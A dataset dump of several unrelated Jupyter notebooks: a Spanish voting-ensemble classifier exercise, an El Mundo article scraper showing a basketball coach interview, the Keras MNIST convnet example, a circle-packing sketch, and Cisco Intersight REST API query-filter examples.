path
stringlengths
7
265
concatenated_notebook
stringlengths
46
17M
TP2/08 - Voting.ipynb
###Markdown Trabajo Práctico 2: Análisis con Voting - Organización de Datos **Alumnos y Padrón** * Grassano, Bruno - 103855 * Romero, Adrián - 103371https://github.com/brunograssano/TP-Organizacion-de-datos Importamos las bibiliotecas ###Code import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns from sklearn.model_selection import train_test_split from sklearn.metrics import classification_report from sklearn.metrics import confusion_matrix from sklearn.metrics import roc_auc_score from sklearn.metrics import roc_curve from sklearn.model_selection import KFold, StratifiedKFold from sklearn.linear_model import LogisticRegression from sklearn.svm import SVC from sklearn.ensemble import RandomForestClassifier, VotingClassifier from sklearn import tree from preprocessing import prepararSetDeDatos from preprocessing import prepararSetDeHoldout from preprocessing import prepararSetDeValidacion from preprocessing import conversionAVariablesNormalizadas from preprocessing import expansionDelDataset from funcionesAuxiliares import mostrarAUCScore from funcionesAuxiliares import mostrarROCCurve from funcionesAuxiliares import mostrarMatrizDeConfusion from funcionesAuxiliares import escribirPrediccionesAArchivo from funcionesAuxiliares import obtenerDatasets from funcionesAuxiliares import obtenerHoldout ###Output _____no_output_____ ###Markdown Importamos los datos y los procesamos ###Code X,y = obtenerDatasets() X = prepararSetDeDatos(X) y = prepararSetDeValidacion(y) ###Output _____no_output_____ ###Markdown Voting Este modelo es un ensamble que consiste en la unión de varios modelos, los cuales votaran de que clase es una instancia. En este caso, decidimos armar el ensamble utilizando los modelos que mejores resultados (segun la metrica AUC-ROC) nos dieron en los otros notebooks.Los elegidos fueron: * Árbol de decisión * SVM * Random Forest * Regresion logísticaCada uno de estos modelos lo recreamos con los mejores hiperparámetros que se encontraron en su notebook.Para el preprocesamiento probamos primero con el basico, el cual incluye a todas las columnas que vienen en el dataframe. ###Code X_voting = conversionAVariablesNormalizadas(X) ###Output _____no_output_____ ###Markdown Dividimos el set de datos en sets de training y test. ###Code X_train, X_test, y_train, y_test = train_test_split(X_voting, y, test_size=0.25, random_state=0) ###Output _____no_output_____ ###Markdown Inicializamos los modelos que usara Voting, cada uno con sus mejores hiperparametros encontrados. En el caso de random forest se les redujo algo la profundidad. ###Code regresion_logistica = LogisticRegression(penalty = 'none', solver = "saga",max_iter = 5000) random_forest = RandomForestClassifier(n_estimators=100, random_state=0,criterion='entropy',max_depth=7) svm = SVC(C=200, kernel='rbf', gamma=0.1,probability=True) arbol = tree.DecisionTreeClassifier(random_state=117, max_depth=4, criterion = 'gini') ###Output _____no_output_____ ###Markdown Creamos el modelo y lo entrenamos. ###Code voting = VotingClassifier(estimators=[('lr', regresion_logistica), ('rf', random_forest),('svm',svm),('tree',arbol)], voting='soft') voting.fit(X_train, y_train) ###Output _____no_output_____ ###Markdown Evaluación de métricas Ahora si, realizamos las predicciones y observamos las métricas. ###Code y_pred = voting.predict(X_test) print(classification_report(y_test, y_pred, target_names=['No vuelve','Vuelve'])) mostrarMatrizDeConfusion(y_pred,y_test) mostrarROCCurve(voting,"Voting",X_test,X_train,y_test,y_train) mostrarAUCScore(voting,"Voting",X_test,y_test) ###Output _____no_output_____ ###Markdown Observamos que obtuvimos una mejora en comparación a los otros modelos en varias de las métricas, por no decir todas. Con otro preprocesamiento Vemos ahora si podemos mejorar este resultado utilizando el Dataframe expandido. ###Code X = expansionDelDataset(X) X.head() columnas_codificables_extra = ['pago_categorizado','edades_estratificadas','categoria_invitados'] columnas_numericas_extra = ['2_clusters','4_clusters','10_clusters','cantidad_total_invitados','total_pagado'] X_voting_exp = conversionAVariablesNormalizadas(X,columnas_codificables_extra,columnas_numericas_extra) X_train, X_test, y_train, y_test = train_test_split(X_voting_exp, y, test_size=0.25, random_state=0) voting_exp = VotingClassifier(estimators=[('lr', regresion_logistica), ('rf', random_forest),('svm',svm),('tree',arbol)], voting='soft') voting_exp.fit(X_train, y_train) ###Output _____no_output_____ ###Markdown Evaluamos ###Code y_pred = voting_exp.predict(X_test) print(classification_report(y_test, y_pred, target_names=['No vuelve','Vuelve'])) mostrarROCCurve(voting_exp,"Voting",X_test,X_train,y_test,y_train) mostrarAUCScore(voting_exp,"Voting",X_test,y_test) ###Output _____no_output_____ ###Markdown Vemos que empeoro probando con toda la informacion nueva. Otro preprocesamiento mas Vemos si cambia algo sacar algunas columnas. Sacamos la del resultado con 10 clusters y la de la cantidad total de invitados. ###Code columnas_codificables_extra = ['pago_categorizado','edades_estratificadas','categoria_invitados'] columnas_numericas_extra = ['2_clusters','4_clusters','total_pagado'] X_voting_exp2 = conversionAVariablesNormalizadas(X,columnas_codificables_extra,columnas_numericas_extra) X_train, X_test, y_train, y_test = train_test_split(X_voting_exp2, y, test_size=0.25, random_state=0) voting_exp2 = VotingClassifier(estimators=[('lr', regresion_logistica), ('rf', random_forest),('svm',svm),('tree',arbol)], voting='soft') voting_exp2.fit(X_train, y_train) ###Output _____no_output_____ ###Markdown Evaluamos este preprocesamiento ###Code y_pred = voting_exp2.predict(X_test) print(classification_report(y_test, y_pred, target_names=['No vuelve','Vuelve'])) mostrarROCCurve(voting_exp2,"Voting",X_test,X_train,y_test,y_train) mostrarAUCScore(voting_exp2,"Voting",X_test,y_test) ###Output _____no_output_____ ###Markdown Mejoro bastante respecto al anterior, pero no llego a superar la metrica del primero. Predicciones sobre el nuevo archivo Realizamos ahora las predicciones del nuevo archivo entregado. ###Code holdout = obtenerHoldout() ids_usuarios = np.array(holdout['id_usuario']) holdout = prepararSetDeHoldout(holdout) holdout_voting = conversionAVariablesNormalizadas(holdout) ###Output _____no_output_____ ###Markdown Realizamos las predicciones y escribimos al archivo CSV. ###Code predicciones_holdout = voting.predict(holdout_voting) escribirPrediccionesAArchivo(predicciones_holdout,"Voting",ids_usuarios) ###Output _____no_output_____
scrape_mondo_doc_sp.ipynb
###Markdown 200, 1100, 2300, 4100, 6800, 8000, 8700, 10700, 14900 convert ###Code doc_list = os.listdir("./data/mondo_scraped/contents_sp/") articles = dict() for file in doc_list: if file[-4:] == 'json': with open(os.path.join("./data/mondo_scraped/contents_sp/", file), "r") as f: articles.update(json.load(f)) len(articles) clean = {k: v for k, v in articles.items() if v is not None} len(clean) docs = pd.DataFrame.from_dict(clean, orient='index') valids = docs.loc[docs['keyfacts'].astype(np.bool), :] valids.shape valids.head() valids.to_pickle('./data/elmondo_es_sp.pkl') valids.iloc[7, :].apply(print); ###Output 'Trabajé en el patio de la prisión de Lleida con el Vaquilla, tras 14 años en una cárcel lo relativizas todo' [' EL MUNDO prepara la Copa del Rey con el entrenador anfitrión en el mítico Pimpi Florida ', ' "Si la Liga no es más seria se nos irá de las manos" ', ' "El Real Madrid tiene la confianza para llegar a cotas que ni ellos mismo esperan" ', ' "Barcelona, como otras veces Madrid, Unicaja o Laboral Kutxa, está rehaciendo lo andado" ', ' "O mejoramos todos la calidad del producto o será difícil que esto no se convierta en una Liga menor" ', " Un 'beatle' en el templo de la Copa "] En las paredes, plantillas añejas del Unicaja, entre fotos de folclóricas, Garbajosa con el fisio de los Toronto Raptors o guiños de la selección a un taberna que huele a mar, vino, copla, Beatles y baloncesto. Joan Plaza se encontró con un santuario: El Pimpi Florida. Pregunta.-Le hemos traído aquí y confiesa que no bebe... Respuesta.-Nunca había bebido whisky hasta que me nombran entrenador del Madrid, me decían que tomara whisky porque no da resaca y lo hice, pero nunca me he tomado dos. No recuerdo estar borracho. P.- Pues ganó títulos como para emborracharse alguna vez... R.- Gané la Liga, estaba allí en medio de todo el mundo medio tirado, me puse en la piel del otro entrenador y casi me disculpé por haber ganado: lo siento. Cuando gané la Uleb, si hubiese podido desaparecer, lo hubiese hecho. Me fui a Trifunovic, y le dije: "la próxima vez ganarás tú". Acabé y me escondí, en aquel momento sólo pensaba en todos los que no habían estado: hay gente que no tienen nombres comerciales y también podrían estar aquí y haber ganado esto. Pensaba: 'pero déjate llevar'. Sentía una felicidad brutal, pero la apartaba. P.-¿Heredó esa coraza de su época como funcionario de prisiones? R.-Si has pasado 14 años en una prisión, lo relativizas todo. Cuando se pierden varios partidos seguidos aquí, en Madrid o Sevilla se dramatiza todo. Sacas conclusiones pero no te pones en la piel del jugador, periodista o directivo que se pone a la defensiva, con mucho miedo. P.-¿Algún momento movido en sus guardias nocturnas? R.-Tuve un motín bonito. Mi segunda noche en la prisión de Lleida, teníamos que quedarnos un funcionario de Granada y yo a pasar la noche con 300 internos. Esto pasa en todas las prisiones, por la noche hay menos gente. Tenía que revisar cada celda por la mirilla, que estuviesen todos dentro, los presos te saludaban [hace la peseta], oí un follón y me dijeron que subiese, que alguien se había salido de la celda. Uno de los que había estado en la fuga del Vaquilla retaba a todos para que entraran en su galería. El jefe dijo que entráramos: le abrió la cara de lado a lado con un barrote de la litera. No entraré en detalles, fue curioso. Llegué a casa manchado de sangre y dije: nunca más, no vuelvo. Aquella noche fue mucho más larga de lo que he dicho, hubo cortes de venas, barrigas...Trabajé en el patio de la prisión de Lleida con el Vaquilla. Tres años en la prisión de jóvenes y diez en la otra. El entrenador del Unicaja Joan Plaza en el Pimpi Florida, Málaga. CARLOS DÍAZ "A la gente le gustaría ir más rápido con la progresión del Unicaja pero sería como cocer y freír todo lo que hay aquí muy rápido...no sirve". P.- Bueno, esa experiencia le serviría en según qué banquillos de la NBA... R.- La tipología de entrenador allí, excepto Popovic en San Antonio y alguno más, son ex jugadores que toleran que el jugador, profesional de por sí, trabaje en el partido y no tanto en el entrenamiento,que tenga una vida mucho más distinta al concepto que tenemos más en Europa. Ojalá se dé esa circunstancia. Siempre he dicho que es verdad que me gustaría entrenar equipos grandes, llevar la Selección Española, la NBA, pero también he dicho muchas veces que si eso no ocurre pero eso tira de ti para que cada día seas mejor, pues bienvenido. Es mi zanahoria, puede ser que nunca pase nada, pero estoy contento de los proyectos que tengo. Me halaga que la gente piense que eres capaz de revertir una situación complicada en algunos clubes. Me gusta volver a Madrid, como volví a Sevilla, y que haya personas de pie aplaudiéndote. Eso es que algo bueno has hecho, y de momento pasa en todos los sitios donde estuve. Hay mucha gente que ha ayudado a que eso sea así y estoy muy orgulloso. .P- ¿Qué tal en Málaga?, ¿Qué le parece la ciudad? R.- Percibo que la sociedad malagueña es más cosmopolita de lo que esperaba. Gente más tolerante, aunque no sea tan monumental como Sevilla, donde fui muy feliz, es cierto que hay un riqueza que no es constatable, no es física. Veo a gente con mucha más capacidad de creación, el movimiento que me explican del mundo de la música, el cine que se mueve entre bambalinas, lugares tan peculiares como éste... Se acerca más a la idea de ciudad de Barcelona de lo que yo esperaba. La gente es mucho más abierta y es un lugar donde poder saca muchos recursos literarios, hay margen y gente peculiar como para que puedan salir reflejadas en tus novelas. P.-¿Así que incentiva esa faceta suya de escritor? R.- No puedo considerarme escritor si juzgo que una persona está preparada para ello como yo lo estoy para entrenar. Un día empecé a escribir estando en prisión una novela que se ha publicado en tres idiomas distintos, que está agotada, los 300 únicos ejemplares que hay en castellano. Está a punto de llegar aquí, pero me sorprende que se haya vendido o que me llegue gente hablando de ello. En Estambul [en el hotel del Unicaja en Euroliga] se presentó un argentino a hablar del libro y me parece algo espectacular porque son anotaciones al viento, son anotaciones en forma novelada que han despertado la inquietud en un tipo de gente y que sólo pretenden estimular que la gente pelee por sus sueños. Mi novela no tiene más sentido que este. Me gusta que sea un libro de cabecera para mucha gente, en Lituania, la última semana antes de irme hicimos una firma de libros y se presentó una persona con 50 notas de distintos colores en distintas hojas con sus reflexiones personales. Me parece increíble porque yo no tengo la formación para ser escritor, pero se han vendido todas las que he escrito, la segunda novela espero que salga este mismo año. Siempre dejo guiños a los lugares en los que he vivido, sería muy buena señal que estuviese aquí el tiempo suficiente y no me echaran antes de tiempo como para que dejara reflejado en mis novelas mi paso por Málaga, por el Pimpi Florida y otros muchos lugares. P.- ¿Cómo llega su equipo a la Copa? R.-Sólo nos planteamos mejorar los números de los años anteriores, eso no oculta que seamos ambiciosos. A la gente le gustaría ir más rápido pero sería como cocer y freír todo lo que hay aquí muy rápido...no sirve. Para que perdure en años y que no sea sólo una temporada, hay que hacerlo de una forma lenta y dura. Contento, el equipo va a más. P.- Pero le está costando reconciliar a la afición con el equipo a pesar de que la temporada no es mala, ¿Le hace falta una gran gesta? R.-Es probable que esa sea una de las recetas. Más allá de la seriedad de este proyecto o que ahora haya mejores números que el año pasado con menos presupuesto, sería un gran subidón una buena Copa del Rey, no sólo ganándola, que sería mucho, pero compitiendo hasta la final. Hacer unos 'play-offs' duros, serios. Hemos de recuperar a toda la gente que ha salido de este proyecto y ahora lo vive colateralmente para que vuelvan dentro de la dinámica del equipo. Una Copa del Rey nos ayudaría a estar arriba. P.- ¿Se quedará con Domantas Sabonis? R.- El club demandaba, y yo entendía que era cierto, que tiene una gran cantera detrás que o se apuesta o no por ella. Los juniors ha sido subcampeones en el torneo de Hospitalet, los infantiles han ganado su torneo. El equipo LEB está en buena tesitura y no podemos jugar a dos barajas: o jugamos la de no cantera y nos olvidamos del tema o la jugamos, pero en ese caso hay que hacerlo en serio. Tenemos un jugador con un potencial como el de Sabonis, Todorovic, Maodo...Son jugadores con potencial de ser muy importantes en uno o dos años. Si tenemos la suerte de que Sabonis siga el año que viene, que es la gran duda, la inversión de este año la recogeremos el año que viene o el siguiente. P.- Pero el hombre a convencer es Sabonis, Arvydas; padre de la criatura... R.- Sí, se debe encontrar en una situación complicada porque quiere que el chico siga estudiando. Domantas es un buen estudiante, tiene la opción de poder ir a universidades americanas y tiene que decidir ya no en verano, sino antes, porque de lo contrario esta apuesta quedará como un brindis al sol y no servirá para nada. Habría que replantearlo y quizás pensar en otro jugador que ocupara esa plaza. Pero ahora los jugadores que están en el junior, el LEB y el cadete ven que el primer equipo no está tan lejos, que no es tan difícil. Nos gustaría tener jugadores malagueños o criados en la cantera de una forma más regular como hubo hace unos años, pero eso requiere un tiempo, un proceso. No he hablado con él del tema, vendrá a la Copa del Rey; hablé con él en Lituania pero no de ese tema. P.-¿Cómo ve al Real Madrid? R.-Tienen una confianza que les puede hacer estar cerca de completar la temporada perfecta. No fallar ni una, están cerca de esa capacidad no sólo porque técnicamente son muy buenos y tienen una plantilla muy compensada, sino porque tienen un nivel de autoconfianza brutal y eso les puede llevar a cotas que ni ellos mismo esperaban. P.-¿Y qué le pasa al Barcelona? El entrenador del Unicaja Joan Plaza posa tras la barra del Pimpi Florida, Málaga. CARLOS DÍAZ "Sabonis tiene la opción ir a universidades americanas y tiene que decidir antes de verano, porque de lo contrario esta apuesta será un brindis al sol, no servirá para nada". R.- Lo que a veces le ha pasado a otros grandes como el Real Madrid, que la reconversión no se ha hecho a tiempo y cuando la vas a hacer tienes que cambiar muchas piezas. Hay proyectos que se erosionan con el tiempo y es muy difícil mantener el status quo que has tenido durante varios años. El secreto del deporte profesional es reconocer el momento en el que estás perdiendo facultades y no atrincherarte sino empezar a cambiar. Barcelona, como otras veces Madrid, Baskonia y Unicaja, está rehaciendo lo andado. P.-¿Debió prever el cambio? R.-Sí, o Baskonia que muchos años ha estado por encima de sus posibilidades: vendían y se mantenían arriba. Este año por fin demostraron que son humanos y necesitarán un tiempo para estar arriba. P.-Y la ACB, ¿necesita cambiar? R.- Está en un punto no tanto crítico como de reinventarse otra vez. Hay que anticiparse al problema que viene, no sólo que la gente sufre para llenar los pabellones, sino que hay una Euroliga que crece exponencialmente, los sponsors se giran a la liga más fuerte. O damos un paso adelante y hacemos una liga más seria, competitiva y organizada o se nos escapará de las manos. P.- Aunque ganó varios títulos, vivió el año pasado lo que viven algunos en la ACB esta campaña: trabajar sin cobrar, ¿Qué le parece? R.- Cobré hasta enero aunque el banco se declaró en bancarrota y deben dinero de la primera parte del año, la segunda parte la cobraré en tres o cuatro años. También es difícil encontrar a un entrenador que en su carrera le hayan pagado puntual siempre. Tuve que vivir esa experiencia y decidir si dejarlo todo y venir a España o seguir hasta el final. Decidí quedarme, ganamos la Liga y ha sido beneficioso para mí y para los que estuvieran a mi lado. Me preocupa mucho que haya jugadores y entrenadores que estén por debajo del mínimo interprofesional que está estipulado por la propia ACB. Todos lo sabemos y nos cuesta no arreglarnos. A lo mejor hemos de ir a una Liga un poco más corta, donde la competitividad sea mayor, donde no hayan tantas diferencias en el marcador pero en el que se pague lo que se pacte al inicio de la temporada. Es importante que hagamos un baloncesto atractivo, hay más competitividad que antes, el fútbol sigue atrayendo a gran parte de la oferta que hay. O mejoramos todos la calidad del producto o será difícil que esto no se convierta en una Liga menor. P.-Catalán y ex del Real Madrid, ¿qué le parece la consulta? R.-Una de las cosas buenas que podemos hacer en esta vida es coger una maleta e irte. Cuando me fui de Barcelona a Madrid me sorprendió que la realidad que se explicaba en Madrid era muy distinta a la que vivía en Barcelona. ¿Cual era cierta? Ninguna de las dos, no es cierto lo que decían los medios catalanes ni lo que explicaban en Madrid. Hablaba con gente en Madrid porque la idea que se explicaba era equivocada, y les decía que no me hicieran caso: llamemos a Aíto García Reneses que es madrileño, vive en Cataluña desde hace muchos años y que él os dé la perspectiva. Pero escuchad a la gente que vive allí, no os guiéis por lo que veis por televisión porque se vende una crispación que no existe como tal, pero es a la que mucha gente saca partido. P.- ¿Perdió amigos por el asunto? R.- No, pero me he dado cuenta de que mucha gente no es capaz de ponerse en tu piel. Fui entrenador del Real Madrid y estoy orgullosísimo de haberlo sido, tengo amistades allí que no quiero perder nunca en mi vida. Pero hay mucha gente muy radical a la que le cuesta entender que quien te ha dado la primera oportunidad de primer nivel mundial es el Real Madrid, y yo soy catalán. Soy el primer catalán de la historia que entrena al Madrid de baloncesto y probablemente al de fútbol. Estoy orgulloso de haberlo vivido, he aprendido un montón, soy más capaz, más listo, pero también le pasará lo mismo a Aíto que ha estado en Barcelona durante 40 años. Las fronteras que nos montamos a veces son bastante ingenuas. P.- Metidos en harina, y con sus antecedentes habrá que preguntarle por la 'doctrina Parot'... R.- Hay que estar en la piel del otro, tener un gran nivel de empatía. Cuando alguien sufre en sus carnes lo que sufre una de estas personas que luego se ha podido acoger a la doctrina Parot es normal que estén molestas o dolidas, pero entendiendo ese dolor, lo que está claro es que hay una ley que hay que mejorar. La ley, no sólo la penitenciaria, también la ley general en este aspecto. Hay que mejorar y ceñirnos todos a la misma, nos guste o no. Hay que encontrar la manera en la que podemos mejorarla si creemos que es posible. En la vida, estoy enfermo de esto, hay que ser empáticos, hay que saber por qué se protesta, por qué se acomodan, por qué no lo hacen... P.- Bueno, Joan, antes de la Copa, ¿Por qué brinda? R.- Porque tenemos el tren sobre las vías y estamos en condiciones. No esperábamos la posición en Liga, el equipo desprende cosas importantes y estamos recolectando gente que estaba desengañada. Pidamos más carbón para la caldera. Ser cabezas de serie es un gran empuje,pero creo en las cosas progresivas, no en las varitas mágicas. El Madrid es el claro favorito, si sigue con esta autoridad será difícil rebatírselo y habrá que competir en nuestra liga que es más abajo. [] 2014-02-03
notebook/mnist_cnn.ipynb
###Markdown Trains a simple convnet on the MNIST dataset. ###Code '''Trains a simple convnet on the MNIST dataset. Gets to 99.25% test accuracy after 12 epochs (there is still a lot of margin for parameter tuning). 16 seconds per epoch on a GRID K520 GPU. ''' from __future__ import print_function import keras from keras.datasets import mnist from keras.models import Sequential from keras.layers import Dense, Dropout, Flatten from keras.layers import Conv2D, MaxPooling2D from keras import backend as K batch_size = 128 num_classes = 10 epochs = 12 # input image dimensions img_rows, img_cols = 28, 28 # the data, shuffled and split between train and test sets (x_train, y_train), (x_test, y_test) = mnist.load_data() if K.image_data_format() == 'channels_first': x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols) x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols) input_shape = (1, img_rows, img_cols) else: x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1) x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1) input_shape = (img_rows, img_cols, 1) x_train = x_train.astype('float32') x_test = x_test.astype('float32') x_train /= 255 x_test /= 255 print('x_train shape:', x_train.shape) print(x_train.shape[0], 'train samples') print(x_test.shape[0], 'test samples') # convert class vectors to binary class matrices y_train = keras.utils.to_categorical(y_train, num_classes) y_test = keras.utils.to_categorical(y_test, num_classes) model = Sequential() model.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=input_shape)) model.add(Conv2D(64, (3, 3), activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Dropout(0.25)) model.add(Flatten()) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(num_classes, activation='softmax')) model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adadelta(), metrics=['accuracy']) model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_test, y_test)) score = model.evaluate(x_test, y_test, verbose=0) print('Test loss:', score[0]) print('Test accuracy:', score[1]) ###Output Using TensorFlow backend.
Example Notebooks/Bubble Generator.ipynb
###Markdown Step 1: Generate a random convex hull ###Code from koebe.algorithms.incrementalConvexHull import randomConvexHullE3WithHighDegreeVertex mesh = randomConvexHullE3WithHighDegreeVertex(100, 20) mesh.outerFace = mesh.verts[-1].remove() # Run this block if you want to see the mesh from koebe.graphics.spherical2viewer import * viewer = S2Viewer(600,600) viewer.toggleSphere() # Hide the sphere viewer.addAll(mesh.edges) viewer.show() ###Output _____no_output_____ ###Markdown Step 2: Circle pack the convex hull ###Code from koebe.geometries.euclidean2 import PointE2 from koebe.algorithms.hypPacker import * def orthProj(p): return PointE2(p.x, p.y) dists = [(orthProj(v.data) - PointE2.O).normSq() for v in mesh.verts] closestToOriginIdx = dists.index(min(dists)) packing, _ = maximalPacking( mesh, num_passes=1000, centerDartIdx = mesh.darts.index(mesh.verts[closestToOriginIdx].aDart) ) # Run this to view the circle packing from koebe.graphics.euclidean2viewer import PoincareDiskViewer, makeStyle viewer = PoincareDiskViewer(600, 600) viewer.addAll(packing.verts) #d = DiskOP2(1,0,0,-1) #viewer.add(d) #viewer.setStyle(d, makeStyle(fill='#00ff00')) viewer.show() from koebe.algorithms.inversiveVoronoi import inversiveVoronoi as IV from koebe.geometries.orientedProjective2 import DiskOP2 sgPacking = packing.duplicate( vdata_transform = lambda vData : DiskOP2.fromCircleE2(vData.toPoincareCircleE2()).toDiskS2() ) # Run this block if you want to see the mesh from koebe.graphics.spherical2viewer import * viewer = S2Viewer(600,600) viewer.toggleSphere() # Hide the sphere viewer.addAll(sgPacking.verts) blueStyle = makeStyle(stroke="#00f", strokeWeight=1, fill="rgba(255, 255, 255, 0.5)") for v in sgPacking.verts: viewer.setStyle(v, blueStyle) viewer.show() arcs = IV(sgPacking) arcs2D = [arc.sgToCircleArcOP2() for arc in arcs] disks2D = [v.data.sgProjectToOP2() for v in sgPacking.verts] # Get toSVG method implemented here. arcs2D[0] # Something along these lines print "Writing SVG file..." svgStr = toSVG(512.0) f = open(svgFilePath, 'w') f.write(svgSztr) f.close() print "Done." ###Output _____no_output_____
resources/ucs/intersight/intersight.ipynb
###Markdown Intersight REST API Query Parameter Usage ExamplesIntersite supports the use of a query language in the URI of a REST API request, as query parameters. This Notebook includes examples of using the Intersight query language to **filter results returned to the REST client, on the server/Intersight side**. This process can simplify the effort to filter results on the client side.- Filter options include: - `eq`, `ne`, `gt`, `lt`, `ge`, `le` - `$filter=NumCpus ge 4` - `and`, `or`, `not` - `($filter=NumCpus ge 4 and NumCpus le 8)` - `in` - `($filter=Model in ('HX220C-M5SX', 'UCSC-C240-M5SN')` - `contains` - `($filter=contains(Model, B200))` - `startswith` - `($filter=startswith(Model, UCSC))` - `endswith` - `($filter=endswith(Model, M5))` - `tolower`/`toupper` - `($filter=contains(Model, toupper(b200)))`Reference: [Intersight Query Syntax](https://intersight.com/apidocs/introduction/query/ "Intersight Query Syntax") --- Import the `intersight_helper` functions Intersight API Authentication Setup**IMPORTANT**Be sure to follow the instructions [**here**](https://wwt.github.io/dcauto-study-resources/sections/section_4/hands-on-learning ) before you attempt to run the next and subsequent cells in this notebook. ###Code # Setup exception handling for the Intersight authentication process try: # Attempt to import the functions in the `intersight_`helper` module - this import attempts Intersight authentication. from intersight_helper import * from requests import HTTPError # Handle missing keyId.txt and keySecret.txt files except FileNotFoundError as e: print('Unable to locate authentication key and signature file combination.') print(f'{e!r}') print(f'{e.filename!r}') ###Output _____no_output_____ ###Markdown Test to determine if authentication and authorization are successful. ###Code # Determine if the keyId.txt and keySecret.txt files successfully authenticate try: results = intersight( method='GET', endpoint='/compute/Blades' ) except HTTPError as e: print('The Intersight authentication process failed.\n' 'Please be sure to follow the "Intersight API Authentication Setup" directions above before continuing.') # The Intersight API authentication and authorization process is successful if you see `200 OK` below ###Output HTTP response: 200 OK Objects returned: 18 ###Markdown --- Create a helper function to display query results. ###Code from typing import Dict, List def display_results( results: Dict, fields: List = None ) -> None: """ Helper function to display query results. Args: results (Dict): Dictionary of results returned by the Intersight API call. fields (List, optional): Optional List of dictionary fields to display. 'Dn' is automatically included. Returns: None. """ # Alias results['Results'] results = results.get('Results', list()) # Check count of results if len(results) == 0: print('No results found.') return for index, result in enumerate(results): # Display current and total results count print(f'{index + 1} of {len(results)}') # Display the 'Dn' for each result print(f'DN: {result.get("Dn", "N/A")}') # Display any optional fields if fields is not None: for field in fields: print(f'\t{field}: {result.get(field, "N/A")}') print() ###Output _____no_output_____ ###Markdown --- Examples Filter for specific resources, using matching criteria ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$filter=NumCpus ge 4' ) # Display the results display_results( results=results, fields=[ 'Model', 'NumCpus' ] ) ###Output HTTP response: 200 OK Objects returned: 2 1 of 2 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 NumCpus: 4 2 of 2 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 NumCpus: 4 ###Markdown --- Return/select only certain matching properties ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$select=Model,Dn,Serial' ) # Display the results display_results( results=results, fields=[ 'Model', 'Serial' ] ) ###Output HTTP response: 200 OK Objects returned: 18 1 of 18 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 2 of 18 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 3 of 18 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 4 of 18 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 5 of 18 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 6 of 18 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 7 of 18 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 8 of 18 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 9 of 18 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 10 of 18 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 11 of 18 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 12 of 18 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 13 of 18 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 14 of 18 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 15 of 18 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 16 of 18 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 17 of 18 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 18 of 18 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 ###Markdown --- Pagination, return the top N results only ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$top=3' ) # Display the results display_results( results=results, fields=[ 'Model', 'Serial', 'NumThreads' ] ) ###Output HTTP response: 200 OK Objects returned: 3 1 of 3 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 NumThreads: 16 2 of 3 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 NumThreads: 32 3 of 3 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 NumThreads: 16 ###Markdown --- Pagination, skip the top N results only ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$skip=3' ) # Display the results display_results( results=results, fields=[ 'Model', 'Serial', 'NumThreads' ] ) ###Output HTTP response: 200 OK Objects returned: 15 1 of 15 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 NumThreads: 16 2 of 15 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 NumThreads: 16 3 of 15 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 NumThreads: 16 4 of 15 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 NumThreads: 16 5 of 15 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 NumThreads: 16 6 of 15 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 NumThreads: 16 7 of 15 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 NumThreads: 16 8 of 15 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 NumThreads: 16 9 of 15 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 NumThreads: 16 10 of 15 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 NumThreads: 32 11 of 15 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 NumThreads: 16 12 of 15 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 